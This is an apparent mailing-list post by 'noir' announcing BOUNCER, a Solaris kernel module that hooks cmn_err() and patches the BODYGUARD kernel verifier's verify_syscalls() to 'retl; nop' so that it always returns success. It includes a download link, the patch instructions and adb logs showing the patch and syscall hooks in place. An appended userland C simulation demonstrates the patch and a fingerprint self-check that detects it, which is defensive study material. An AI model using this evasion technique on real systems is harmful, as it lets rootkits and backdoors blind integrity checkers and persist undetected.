Apologies for replying to my own mail, but I must say: I have successfully developed what I was talking about below. I have also fixed an alignment issue that leads to a crash in some rare cases. You can download the new package from: http://gsu.linux.org.tr/~noir/b.tar.gz

> primary_inhouse_kernel_function_used_by_bodyguard()
> {
>   .....
>   if(kobj_getsymvalue(verify_syscalls,1)){
>     do page protection manipulation
>     patch the proper place with "return TRUE" of the verify_syscalls()
>     !! this will make verify_syscalls return TRUE meaning no problems
>   }
>   ....
>   do the realstuff ...
> }
>
> this will render any kernel integrity level checker useless. solution
> is simple: integrity checkers have to be stealth too, like their counterparts
> (backdoors)

Here is how things are: BOUNCER hooks cmn_err()* and checks if verify_syscalls() resolves. If YES, it patches the first 2 instructions of verify_syscalls with "retl; nop".

* cmn_err() is used for reporting to userland (through /var/adm/messages), so at _init() BODYGUARD calls cmn_err() to report its successful installation. Nada! BOUNCER kicks in and patches verify_syscalls() ... ;0)

Now you can even change the sysent/sysent32 table with no worries ; )

Logs of BOUNCER in action:

bash-2.03# uname -a
SunOS slint 5.8 Generic_108528-09 sun4u sparc SUNW,Ultra-5_10
bash-2.03# isainfo -b
64
bash-2.03# cd BOUNCER/
bash-2.03# modload b2
bash-2.03#
bash-2.03# /usr/local/sbin/sshd
bash: /usr/lib/.funky/sshd: No such file or directory
bash-2.03# cd ../BODYGUARD
bash-2.03# sh runbodyguard_verifier.sh
This is the license for BodyGuard Kernel Verifier, Demo Version 1.0
.....
Jul  7 04:45:50 slint bodyguard: [ID 801043 kern.notice] NOTICE: Installing Immunity BODYGUARD module!
Jul  7 04:45:50 slint bodyguard: [ID 300378 kern.notice] NOTICE: If there are any problems, please e-mail Dave Aitel at dave@immunitysec.com
Jul  7 04:45:50 slint bodyguard: [ID 779008 kern.notice] NOTICE: This is just a demo version of the Immunity BODYGUARD product.
Jul  7 04:45:50 slint bodyguard: [ID 530759 kern.notice] NOTICE: For a year-long site license, or limited source code license, please see http://www.immunitysec.com.
Jul  7 04:45:50 slint bodyguard: [ID 222896 kern.notice] NOTICE: Done installing BODYGUARD.
Jul  7 04:45:51 slint bodyguard: [ID 887483 kern.notice] NOTICE: Removing BODYGUARD module!
Jul  7 05:01:22 slint bodyguard: [ID 801043 kern.notice] NOTICE: Installing Immunity BODYGUARD module!
Jul  7 05:01:22 slint bodyguard: [ID 300378 kern.notice] NOTICE: If there are any problems, please e-mail Dave Aitel at dave@immunitysec.com
Jul  7 05:01:22 slint bodyguard: [ID 779008 kern.notice] NOTICE: This is just a demo version of the Immunity BODYGUARD product.
bash-2.03# modload bodyguard
bash-2.03# adb -k /dev/ksyms
physmem 3b5b
verify_syscalls/i
verify_syscalls:
verify_syscalls:        retl
verify_syscalls+4:      nop
cmn_err+0x94/i
cmn_err+0x94:           call    uncle_steve_albini
exece+0xc/i
exece+0xc:              call    hook_execcommon

later,
noir
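The attack noir describes, and the self-check a verifier would need in order to notice it, as an added userland simulation. This is not code from the BOUNCER or BODYGUARD packages and touches no Solaris kernel API: the "kernel text" of verify_syscalls() is a constructed array of 32-bit SPARC instruction words, the page-protection step is simulated by plain array writes, and the FNV-1a fingerprint is an illustrative choice. The retl (jmpl %o7+8, %g0 = 0x81C3E008) and nop (0x01000000) encodings are the real SPARC ones. It goes one step past the post: besides matching the exact retl/nop stub, it snapshots the function's words so that any in-place patch is caught, which is the direction the "integrity checkers have to be stealth too" remark points in.

```c
/*
 * Added example, not part of noir's post or of Immunity's product:
 * simulate BOUNCER stubbing out verify_syscalls() with "retl; nop" and
 * show a self-check that detects it.  Everything here runs in userland
 * over a constructed buffer; no kernel memory is involved.
 */
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Real SPARC encodings: retl is "jmpl %o7+8, %g0", nop is "sethi 0, %g0". */
#define SPARC_RETL 0x81C3E008u
#define SPARC_NOP  0x01000000u

/* Constructed stand-in for the first words of verify_syscalls().  Only the
 * fact that they differ from retl/nop and from any later patch matters. */
enum { TEXT_WORDS = 8 };
static uint32_t verify_syscalls_text[TEXT_WORDS] = {
    0x9DE3BF50u, /* save %sp, -176, %sp            */
    0x11000000u, /* sethi %hi(0), %o0              */
    0x90122000u, /* or %o0, 0, %o0                 */
    0x7FFFFFFFu, /* call (constructed back-reference) */
    0x01000000u, /* nop (delay slot)               */
    0x80A22000u, /* cmp %o0, 0                     */
    0x81C7E008u, /* ret                            */
    0x81E80000u, /* restore                        */
};

/* What the post says BOUNCER does once its cmn_err() hook fires: overwrite
 * the first two instruction words with "retl; nop".  In a real kernel this
 * needs the page made writable first; here it is just an array write. */
void bouncer_patch(uint32_t *text)
{
    text[0] = SPARC_RETL;
    text[1] = SPARC_NOP;
}

/* Detector 1: signature for the exact stub described in the post. */
int looks_like_retl_nop_stub(const uint32_t *text)
{
    return text[0] == SPARC_RETL && text[1] == SPARC_NOP;
}

/* Detector 2: 32-bit FNV-1a over the function's text words.  Taken once,
 * before anything untrusted can run, it catches any in-place patch, not
 * only retl/nop.  (Hash choice is illustrative, not the product's.) */
uint32_t text_fingerprint(const uint32_t *text, size_t words)
{
    uint32_t h = 2166136261u;
    for (size_t i = 0; i < words; i++) {
        for (int b = 0; b < 4; b++) {
            h ^= (text[i] >> (8 * b)) & 0xFFu;
            h *= 16777619u;
        }
    }
    return h;
}

/* 0 = verifier's own entry code intact, 1 = stubbed to "return",
 * 2 = some other modification (fingerprint mismatch). */
int verifier_self_check(const uint32_t *text, size_t words, uint32_t baseline)
{
    if (looks_like_retl_nop_stub(text))
        return 1;
    if (text_fingerprint(text, words) != baseline)
        return 2;
    return 0;
}

/* Scenario: snapshot clean text, confirm it passes, apply the BOUNCER-style
 * patch, confirm the self-check reports the stub.  Returns 1 on success. */
int run_scenario(void)
{
    uint32_t text[TEXT_WORDS];
    memcpy(text, verify_syscalls_text, sizeof text);
    uint32_t baseline = text_fingerprint(text, TEXT_WORDS);

    if (verifier_self_check(text, TEXT_WORDS, baseline) != 0)
        return 0;
    bouncer_patch(text);
    return verifier_self_check(text, TEXT_WORDS, baseline) == 1;
}

int main(void)
{
    printf("self-check after patch: %s\n", run_scenario() ? "detected" : "MISSED");
    return 0;
}
```

The order of events is the point: the snapshot has to be taken and the self-check has to run before the verifier announces itself through cmn_err(), because that announcement is exactly the moment the hook in the post fires. A check that compares the first words of its own verification routine against a copy taken earlier, rather than trusting that routine's return value, does not care that the routine now returns early.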